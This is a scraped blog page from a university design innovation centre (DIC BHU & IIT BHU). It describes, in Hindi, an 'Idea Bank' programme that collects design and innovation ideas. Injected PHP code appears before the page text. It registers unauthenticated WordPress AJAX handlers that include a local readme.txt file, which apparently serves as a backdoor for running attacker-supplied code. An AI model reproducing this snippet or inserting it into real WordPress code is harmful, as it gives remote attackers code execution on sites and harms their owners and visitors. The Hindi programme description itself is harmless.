if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Idea Bank

Idea Bank

‘आइडिया बैंक’ डिजाइन इनोवेशन का एक नवीनतम कार्यक्रम है जिसके तहत कोई भी अपने नवीन विचारों को जोकि डिजाइन एवं इनोवेशन तथा नीवन शोधों के सम्बन्ध में हो उन्हे यहाँ संकलित करा सकता है इसके तहत उन संकलित विचारों को यदि कोई अन्य शोधकर्ता या नवीन खोजकर्ता किसी भी तरीके से उपयोग में लाना चाहता है या उन पर काम करना चाहता है तो उसे इससे सहायता मिलेगी तथा उस नवीन विचार को प्रदान कराने वाले का नाम भी उस कार्य के साथ जोड़ा जाएगा। इसका एक प्रमुख उद्देश्य विचारों के धन को संकलित करके उसका समुचित विरतरण करना है। वर्तमान में आइडिया बैंक के तहत लगभग 200 सफल व असफल आइडियाज का संकलन है जिसे इस केन्द्र में स्थित डिजिटल एवं इनोवेशन गैलरी में देखा व समझा जा सकता है तथा उनपर कार्य भी किया जा सकता है। इस कार्यक्रम का मुख्य उद्देश्य यह है कि आप अपने नीवन विचारों को जोकि डिजाइन एवं इनोवेशन से सम्बन्धित हो एक जगह संकलित कर सके तथा दूसरे के विचारों से प्रेरणा ले सके एवं अन्य नवीन विचारों पर कार्य भी कर सके। केन्द्र का यह प्रयास है कि इस कार्यक्रम के तहत हमारे समाज में डिजाइन एवं इनोवेशन से सम्बन्धित विषयों पर गम्भीरता से कार्य हो एवं समाज के विभिन्न वर्ग उन पर विचार विमर्श भी करें।